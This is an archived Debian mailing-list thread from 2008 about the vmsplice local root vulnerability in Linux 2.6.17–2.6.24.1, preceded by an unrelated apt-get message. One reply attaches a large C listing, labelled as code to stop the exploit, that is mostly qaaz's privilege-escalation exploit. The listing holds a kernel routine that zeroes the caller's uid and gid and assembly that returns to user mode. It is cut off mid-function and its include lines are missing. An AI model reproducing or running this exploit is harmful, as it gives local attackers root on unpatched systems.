DG965ss

2008-02-10 Thread Dr. Helmut G. Enders 

My problems with corrupt apt-get  .deb files
has gone, when I upgraded to SID.

Now it seems, that everything works as expected.

Thanks for your help.

Helmut




--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]


--
CS Cybernetic Systems GmbH
Markgrafenstr. 19
D-95100 Selb
Germany
--
Dr. Helmut G. Enders
Phone: +49 9287 9929 11
Fax:   +49 9287 9929 32
Email: [EMAIL PROTECTED]
--
COO:  Dipl.-Kfm.Univ. Hiltrud Enders
County Court: Hof HRB 1968
VAT ID:   DE 154589625
--


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: Root exploit

2008-02-10 Thread Alex Samad 
On Mon, Feb 11, 2008 at 02:02:40PM +1100, Alex Samad wrote:
> On Mon, Feb 11, 2008 at 01:21:42AM +, Stephen Gran wrote:
> > This one time, at band camp, Alex Samad said:
> > > Hi
> > > 
> > > http://it.slashdot.org/article.pl?sid=08/02/10/2011257 & 
> > > http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=464953
> > > 
> > > is the amd64 kernel susceptible to this ?
> > 
> > Yes, expect a DSA soon.
> there was a stop the exploit in the bug report, but it doesn't seem to be 
> available any more, but there was a question about it being only i386
from the debian-user list (attached code to stop the exploit)


> 
> 
> > -- 
> >  -
> > |   ,''`.Stephen Gran |
> > |  : :' :[EMAIL PROTECTED] |
> > |  `. `'Debian user, admin, and developer |
> > |`- http://www.debian.org |
> >  -
> 
> 
> 
> -- 
> Baseball is a skilled game.  It's America's game - it, and high taxes.
>   -- The Best of Will Rogers



-- 
"This case has had full analyzation and has been looked at a lot.  I understand 
the emotionality of death penalty cases."

- George W. Bush
06/23/2000
Seattle Post-Intelligencer
/*
 * Linux vmsplice Local Root Exploit
 * By qaaz
 *
 * Linux 2.6.17 - 2.6.24.1
 */

#define _GNU_SOURCE
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#define __KERNEL__
#include 

#define PIPE_BUFFERS16
#define PG_compound 14
#define uintunsigned int
#define static_inline   static inline __attribute__((always_inline))
#define STACK(x)(x + sizeof(x) - 40)

struct page {
unsigned long flags;
int count;
int mapcount;
unsigned long private;
void *mapping;
unsigned long index;
struct { long next, prev; } lru;
};

voidexit_code();
charexit_stack[1024 * 1024];

voiddie(char *msg, int err)
{
printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err));
fflush(stdout);
fflush(stderr);
exit(1);
}

#if defined (__i386__)

#ifndef __NR_vmsplice
#define __NR_vmsplice   316
#endif

#define USER_CS 0x73
#define USER_SS 0x7b
#define USER_FL 0x246

static_inline
voidexit_kernel()
{
__asm__ __volatile__ (
"movl %0, 0x10(%%esp) ;"
"movl %1, 0x0c(%%esp) ;"
"movl %2, 0x08(%%esp) ;"
"movl %3, 0x04(%%esp) ;"
"movl %4, 0x00(%%esp) ;"
"iret"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}

static_inline
void *  get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movl %%esp, %%eax ;"
"andl %1, %%eax ;"
"movl (%%eax), %0"
: "=r" (curr)
: "i" (~8191)
);
return (void *) curr;
}

#elif defined (__x86_64__)

#ifndef __NR_vmsplice
#define __NR_vmsplice   278
#endif

#define USER_CS 0x23
#define USER_SS 0x2b
#define USER_FL 0x246

static_inline
voidexit_kernel()
{
__asm__ __volatile__ (
"swapgs ;"
"movq %0, 0x20(%%rsp) ;"
"movq %1, 0x18(%%rsp) ;"
"movq %2, 0x10(%%rsp) ;"
"movq %3, 0x08(%%rsp) ;"
"movq %4, 0x00(%%rsp) ;"
"iretq"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}

static_inline
void *  get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movq %%gs:(0), %0"
: "=r" (curr)
);
return (void *) curr;
}

#else
#error "unsupported arch"
#endif

#if defined (_syscall4)
#define __NR__vmsplice  __NR_vmsplice
_syscall4(
long, _vmsplice,
int, fd,
struct iovec *, iov,
unsigned long, nr_segs,
unsigned int, flags)

#else
#define _vmsplice(fd,io,nr,fl)  syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
#endif

static uint uid, gid;

voidkernel_code()
{
int i;
uint*p = get_current();

for (i = 0; i < 1024-13; i++) {
if (p[0] == uid && p[1] == uid &&
p[2] == uid && p[3] == uid &&
p[4] == gid && p[5] == gid &&
p[6] == gid && p[7] == gid) {
p[0] = p[1] = p[2] = p[3] = 0;
p[4] = p[5] = p[6] = p[7] = 0;
p = (uint *) ((char *)(p + 8) + sizeof(void *));
p[0] = p[1] = p[2] = ~0;
break;
}
p++;
}   

exit_kernel();
}

voidde_exploit()
{
  char line[4096];
  FILE* ksyms = fopen("/proc/kallsyms", "r");
  size_t address = 0;

Re: Root exploit

2008-02-10 Thread Alex Samad 
On Mon, Feb 11, 2008 at 01:21:42AM +, Stephen Gran wrote:
> This one time, at band camp, Alex Samad said:
> > Hi
> > 
> > http://it.slashdot.org/article.pl?sid=08/02/10/2011257 & 
> > http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=464953
> > 
> > is the amd64 kernel susceptible to this ?
> 
> Yes, expect a DSA soon.
there was a stop the exploit in the bug report, but it doesn't seem to be 
available any more, but there was a question about it being only i386


> -- 
>  -
> |   ,''`.Stephen Gran |
> |  : :' :[EMAIL PROTECTED] |
> |  `. `'Debian user, admin, and developer |
> |`- http://www.debian.org |
>  -



-- 
Baseball is a skilled game.  It's America's game - it, and high taxes.
-- The Best of Will Rogers


signature.asc
Description: Digital signature

Re: Root exploit

2008-02-10 Thread Stephen Gran 
This one time, at band camp, Alex Samad said:
> Hi
> 
> http://it.slashdot.org/article.pl?sid=08/02/10/2011257 & 
> http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=464953
> 
> is the amd64 kernel susceptible to this ?

Yes, expect a DSA soon.
-- 
 -
|   ,''`.Stephen Gran |
|  : :' :[EMAIL PROTECTED] |
|  `. `'Debian user, admin, and developer |
|`- http://www.debian.org |
 -


signature.asc
Description: Digital signature

Re: Root exploit

2008-02-10 Thread Leonardo Baldelli 
from 2.6.17 to 2.6.24.1 ,when implementation vmsplice()

i tested the exploit in debian testing with kernel 2.6.23.14 is
vulnerable.

sorry my english sucks

bye

/* espaƱol */

desde la version 2.6.17 a 2.6.24.1 es vulnerable , otras versiones q
no se haya implentado vmsplice() no se si es .. por lo que lei era eso

/*  */

Saludos



On Mon, 11 Feb 2008 09:18:49 +1100
Alex Samad <[EMAIL PROTECTED]> wrote:

> Hi
> 
> http://it.slashdot.org/article.pl?sid=08/02/10/2011257 & 
> http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=464953
> 
> is the amd64 kernel susceptible to this ?
>

Root exploit

2008-02-10 Thread Alex Samad 
Hi

http://it.slashdot.org/article.pl?sid=08/02/10/2011257 & 
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=464953

is the amd64 kernel susceptible to this ?

-- 
"I hope I--I don't want to sound like I've made no mistakes. I'm confident I 
have. I just haven't--you just put me under the spot here, and maybe I'm not as 
quick on my feet as I should be in coming up with one."

- George W. Bush
04/03/2004
Washington, DC
Press Conference - after being asked to name the biggest mistake he had made


signature.asc
Description: Digital signature